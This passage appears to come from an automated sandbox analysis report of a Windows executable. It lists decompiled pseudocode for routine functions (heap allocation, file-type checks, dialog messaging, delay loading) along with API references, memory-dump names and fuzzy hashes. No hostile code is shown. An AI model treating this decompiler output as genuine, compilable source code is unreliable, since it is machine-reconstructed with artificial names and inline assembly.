                0x00cb9f47
                0x00cb9f4a
                0x00cb9f4d
                0x00cb9f50
                0x00cb9f56
                0x00cb9f5b
                0x00cb9f61
                0x00cb9f66
                0x00cb9f68
                0x00cb9f6a
                0x00cb9f6d
                0x00cb9f73
                0x00cb9f7a
                0x00cb9f7f
                0x00cb9f81
                0x00cb9f83
                0x00cb9f89
                0x00cb9f8c
                0x00cb9f94
                0x00cb9f85
                0x00cb9f85
                0x00cb9f85
                0x00cb9f9f
                0x00cb9f9f
                0x00cb9fa4
                0x00cb9faf
                0x00cb9fb4
                0x00cb9f35
                0x00cb9f3b
                0x00cb9f40
                0x00cb9f40
                0x00cb9fbb
                0x00cb9fc6

                APIs
                • __EH_prolog.LIBCMT ref: 00CB9EF4
                  • Part of subcall function 00CA137D: __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA137D: new.LIBCMT ref: 00CA13FA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 699c008ffd62e5557cbd34620ef17c41f5d975cd4d8dd561c18dacdf06a9cab4
                • Instruction ID: ea2bd522637c2c2021e57f18aa5b6132945b95c5bbf1c082528e38df61bfabbe
                • Opcode Fuzzy Hash: 699c008ffd62e5557cbd34620ef17c41f5d975cd4d8dd561c18dacdf06a9cab4
                • Instruction Fuzzy Hash: 63215E71D0424A9BCF14DFA5C9919FEB7F4EF19314F0404AEE909A7242D7356E05DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA910B, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00CA910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E00CBD870(E00CD1321, _t42);
				E00CA6ED7(_t42 - 0x20, E00CA7C3C());
				_push( *((intOrPtr*)(_t42 - 0x1c)));
				_push( *((intOrPtr*)(_t42 - 0x20)));
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E00CAC70F();
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E00CAC8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t42 - 0x1c)));
						_push( *((intOrPtr*)(_t42 - 0x20)));
						_t40 = E00CAC70F();
					} while (_t40 > 0);
				}
				_t21 = E00CA159C(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}











                0x00ca910b
                0x00ca9110
                0x00ca9122
                0x00ca9127
                0x00ca912d
                0x00ca9130
                0x00ca9139
                0x00ca913d
                0x00ca9140
                0x00ca9144
                0x00ca9147
                0x00ca9147
                0x00ca9149
                0x00ca914a
                0x00ca914c
                0x00ca9154
                0x00ca9154
                0x00ca9158
                0x00ca9161
                0x00ca9168
                0x00ca9169
                0x00ca916b
                0x00ca916b
                0x00ca916d
                0x00ca9173
                0x00ca917b
                0x00ca917d
                0x00ca9182
                0x00ca9186
                0x00ca918f
                0x00ca9199

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: b40a3472c36ef966ed0d95339561f7842acb71bbfb9f5f501a613036e7090887
                • Instruction ID: 5fc097133a21289fc4eaa63bd129d23397d79f5a8a008d67c67926d6969e9026
                • Opcode Fuzzy Hash: b40a3472c36ef966ed0d95339561f7842acb71bbfb9f5f501a613036e7090887
                • Instruction Fuzzy Hash: DF11E577E0042BA7CF12AB98CC829EEB736FF49344F054115FD11A7252CA348D0497E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC6FF, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00CBC6FF(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E00CBD870(E00CD1520, _t43);
				_push(_t26);
				E00CBD940();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00CC4D7E(0xcf39fa, "X");
				E00CAFB08(0xcf5a1c, _t37, 0xcd22e0);
				E00CC4D7E(0xcf4a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E00CA5A9F(0xceb708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0xcf29d8 = _t18;
				 *0xcf29d4 = _t18;
				 *0xcf29d0 = _t18;
				_t19 =  *0xce75d4; // 0x0
				 *0xcf185b = _t19;
				_t20 =  *0xce75d5; // 0x1
				 *0xcf1894 = 1;
				 *0xcf1897 = 1;
				 *0xcf185c = _t20;
				E00CA7ADF(_t43 - 0x2108, _t37,  *_t4, 0xceb708);
				 *(_t43 - 4) = 1;
				E00CA7C55(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00CA7B71(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}













                0x00cbc6ff
                0x00cbc704
                0x00cbc709
                0x00cbc70f
                0x00cbc714
                0x00cbc717
                0x00cbc724
                0x00cbc735
                0x00cbc742
                0x00cbc753
                0x00cbc758
                0x00cbc758
                0x00cbc764
                0x00cbc765
                0x00cbc76a
                0x00cbc76f
                0x00cbc774
                0x00cbc779
                0x00cbc77e
                0x00cbc784
                0x00cbc78b
                0x00cbc792
                0x00cbc797
                0x00cbc7a2
                0x00cbc7a6
                0x00cbc7b1
                0x00cbc7bb
                0x00cbc7c6

                APIs
                • __EH_prolog.LIBCMT ref: 00CBC704
                  • Part of subcall function 00CA7ADF: __EH_prolog.LIBCMT ref: 00CA7AE4
                  • Part of subcall function 00CA7ADF: new.LIBCMT ref: 00CA7B28
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 91833a69e93ed5eeac4b5ded2b857433e70ccba574f334f4728f3fdc099ebaeb
                • Instruction ID: 186e6da3a6d7b8c2b6ad31dfc56baa51ea9fc2392da34230aea5f8a0e01b733a
                • Opcode Fuzzy Hash: 91833a69e93ed5eeac4b5ded2b857433e70ccba574f334f4728f3fdc099ebaeb
                • Instruction Fuzzy Hash: 0D113A71509284AEC704EBA8ED02BFD7FB0EB65324F04416FF50557292DBB10A80EB22
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC7A8A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00CC7A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00CC7ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xd00874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00CC7906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00CC6763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









                0x00cc7a8a
                0x00cc7a90
                0x00cc7a96
                0x00cc7ac8
                0x00cc7acd
                0x00cc7ad3
                0x00000000
                0x00cc7ad3
                0x00cc7a9a
                0x00cc7a9c
                0x00cc7a9c
                0x00cc7ab3
                0x00cc7abc
                0x00cc7ac4
                0x00000000
                0x00000000
                0x00cc7aa4
                0x00cc7aa6
                0x00000000
                0x00000000
                0x00cc7aa9
                0x00cc7aae
                0x00cc7aaf
                0x00cc7ab1
                0x00000000
                0x00000000
                0x00cc7ab1
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 1a3c2d7fa98ad6604a703da9df34e76c6e8ae7a7bd480068d4dfdb2860698530
                • Instruction ID: 0a9ea2eac59c83de496915e89f5d056558b5274a4d664933589b14d14aa760ee
                • Opcode Fuzzy Hash: 1a3c2d7fa98ad6604a703da9df34e76c6e8ae7a7bd480068d4dfdb2860698530
                • Instruction Fuzzy Hash: F3E065319492217AD7212666DE05F5E7A49EB517B1F19236DEC24961D0CB21CF00BAE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA5A1D, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00CA5A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00CBD870(E00CD1216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00CAAD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00CAFAE6();
				 *(_t36 - 4) = 1;
				E00CAFAE6();
				 *(_t36 - 4) = 2;
				E00CAFAE6();
				 *(_t36 - 4) = 3;
				E00CAFAE6();
				 *(_t36 - 4) = 4;
				E00CAFAE6();
				 *(_t36 - 4) = 5;
				E00CA5C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






                0x00ca5a1d
                0x00ca5a22
                0x00ca5a27
                0x00ca5a29
                0x00ca5a2b
                0x00ca5a2e
                0x00ca5a33
                0x00ca5a33
                0x00ca5a3d
                0x00ca5a48
                0x00ca5a4c
                0x00ca5a57
                0x00ca5a5b
                0x00ca5a66
                0x00ca5a6a
                0x00ca5a75
                0x00ca5a79
                0x00ca5a80
                0x00ca5a84
                0x00ca5a8f
                0x00ca5a99

                APIs
                • __EH_prolog.LIBCMT ref: 00CA5A22
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 4458261e4166b79041e074b23d19b3ce9c41eb0c685eae0ebc361f36597da168
                • Instruction ID: 4f94f06267ad1da7866a498617b98de03f38ccb3c57a52fae37387774f2ac6f4
                • Opcode Fuzzy Hash: 4458261e4166b79041e074b23d19b3ce9c41eb0c685eae0ebc361f36597da168
                • Instruction Fuzzy Hash: 0C01D130919656DAD705E7E4C1053EEB7B49F16318F0005ADE44E53382DBB82B04F763
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA94DA, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00CA94DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00CA6C7B(0xce00e0, _t21 + 0x1e);
				}
				return _t16;
			}





                0x00ca94dc
                0x00ca94de
                0x00ca94e4
                0x00ca94ea
                0x00ca94fb
                0x00ca9500
                0x00ca9502
                0x00ca9502
                0x00ca9504
                0x00ca9504
                0x00ca9508
                0x00ca950e
                0x00ca951e
                0x00ca951e
                0x00ca9527

                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CA94AA), ref: 00CA94F5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 3966f949828ce5d4b9653bb8353d8a3250eba7131e25cb8806eb89dbf5183488
                • Instruction ID: 4d119f0a81593444f975bc0a613bbf0cde641f64491a63e41accb384e29d0884
                • Opcode Fuzzy Hash: 3966f949828ce5d4b9653bb8353d8a3250eba7131e25cb8806eb89dbf5183488
                • Instruction Fuzzy Hash: 98F05EB0842B064EDB318A24C54B792B7E8DB13739F088B1E90F7438E0D7716A8D9B51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAA1B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CAA1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00CAB5E5(_a4) == 0) {
					_t12 = E00CAA2DF(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00CA9ECD( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00CA9EE5( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                0x00caa1b2
                0x00caa1ba
                0x00caa1c8
                0x00caa1d5
                0x00caa1dd
                0x00000000
                0x00000000
                0x00caa1e0
                0x00caa1ec
                0x00caa1fe
                0x00caa209
                0x00000000
                0x00caa20f
                0x00caa1ca
                0x00000000

                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA1E0
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 5b9424f2878aa648ce551d103e5b98c9aa39bdf499e98940e47a86acc9cd4db5
                • Instruction ID: 9b624cc1bb74bfa204d5ec2e76316360b789d2f523806dac5308ba4c51feccc0
                • Opcode Fuzzy Hash: 5b9424f2878aa648ce551d103e5b98c9aa39bdf499e98940e47a86acc9cd4db5
                • Instruction Fuzzy Hash: 37F08235009781BBCA225BB44805BCBBBA16F1733AF048A4DF1FD52193C7765495E722
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB02E8, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00CB02E8() {
				void* __esi;
				void* _t2;

				E00CB0FAF(); // executed
				_t2 = E00CB0FB4();
				if(_t2 != 0) {
					_t2 = E00CA6CC9(_t2, 0xce00e0, 0xff, 0xff);
				}
				if( *0xce00eb != 0) {
					_t2 = E00CA6CC9(_t2, 0xce00e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                0x00cb02ea
                0x00cb02ef
                0x00cb0300
                0x00cb0305
                0x00cb0305
                0x00cb0311
                0x00cb0316
                0x00cb0316
                0x00cb031d
                0x00cb0325

                APIs
                • SetThreadExecutionState.KERNEL32 ref: 00CB031D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: a5effb8ca096754eff29a0e3c2eadfef2d1ee5f340ee3a651ade6f2951d44533
                • Instruction ID: 5b021dfe86ba9cead5b8418a1856baaaa8abac0ce6a67d02f4cd6db4c279cb05
                • Opcode Fuzzy Hash: a5effb8ca096754eff29a0e3c2eadfef2d1ee5f340ee3a651ade6f2951d44533
                • Instruction Fuzzy Hash: E8D02B2070119012DF2133AC28497FF074A4FC2728F2C006AB045263D3CB8908CBB3E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB95CF, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00CB95CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00CBD7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00CB938E(__eax, _a4, _a8); // executed
				return _t6;
			}





                0x00cb95d2
                0x00cb95d3
                0x00cb95d5
                0x00cb95da
                0x00cb95df
                0x00000000
                0x00cb95f0
                0x00cb95e9
                0x00000000

                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 00CB95D5
                  • Part of subcall function 00CB938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CB93AF
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                • Instruction ID: 3df2b238076cfd372397b2312c79360dc653d6c182955eed8835ea941797bf06
                • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                • Instruction Fuzzy Hash: B4D0A73024410D7BDF61FA758C02FFE7A98DB00310F004125BD06C5151FD71DE10B2A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9745, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CA9745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




                0x00ca9749
                0x00ca9751
                0x00ca975a
                0x00ca9767
                0x00ca9761
                0x00ca9763
                0x00ca9763
                0x00ca974b
                0x00ca974d
                0x00ca974d

                APIs
                • GetFileType.KERNELBASE(000000FF,00CA9683), ref: 00CA9751
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 024377f2f7df05f5810e352caa2f93ad0aa1a2ba3799d511722310f9832ed7d5
                • Instruction ID: 0fd7c4f21eb6451e2e11f696905d6a9e2f62a8c7c2bb2ebfb0928f1ddd232f1e
                • Opcode Fuzzy Hash: 024377f2f7df05f5810e352caa2f93ad0aa1a2ba3799d511722310f9832ed7d5
                • Instruction Fuzzy Hash: 74D01230031601958F211E3C4E4A0997755DF8336E738C6A4D135C40B1D732C903F520
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC9FE, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBC9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xce75c8, 0x6a, 0x402, E00CAF749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00CBA388(); // executed
				return _t7;
			}




                0x00cbca23
                0x00cbca29
                0x00cbca2e

                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00CBCA23
                  • Part of subcall function 00CBA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                  • Part of subcall function 00CBA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                  • Part of subcall function 00CBA388: IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                  • Part of subcall function 00CBA388: TranslateMessage.USER32(?), ref: 00CBA3CC
                  • Part of subcall function 00CBA388: DispatchMessageW.USER32(?), ref: 00CBA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 1594b2f110f26cccc2d0f87de7f18884f7bf229d3e0174040de7e02816a4c5dd
                • Instruction ID: cc517b7712e9c24ab14c1476a521258f1f8e5c3730dbdf064588af95f6bcfd05
                • Opcode Fuzzy Hash: 1594b2f110f26cccc2d0f87de7f18884f7bf229d3e0174040de7e02816a4c5dd
                • Instruction Fuzzy Hash: F8D09236159300AADB022BA1CE06F0E7AF6AB8CB09F004659B285740B18672ED21AB12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1C9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf0c); // executed
				goto __eax;
			}








                0x00cbd1ae
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 25a9acc15338df497f311b4985af4a87f23ab1c00fbc5683c2815c03d0a849cd
                • Instruction ID: 1ae0d6f10ab852f636517a3668539e433ee3196cff95432953a79636000cbfb4
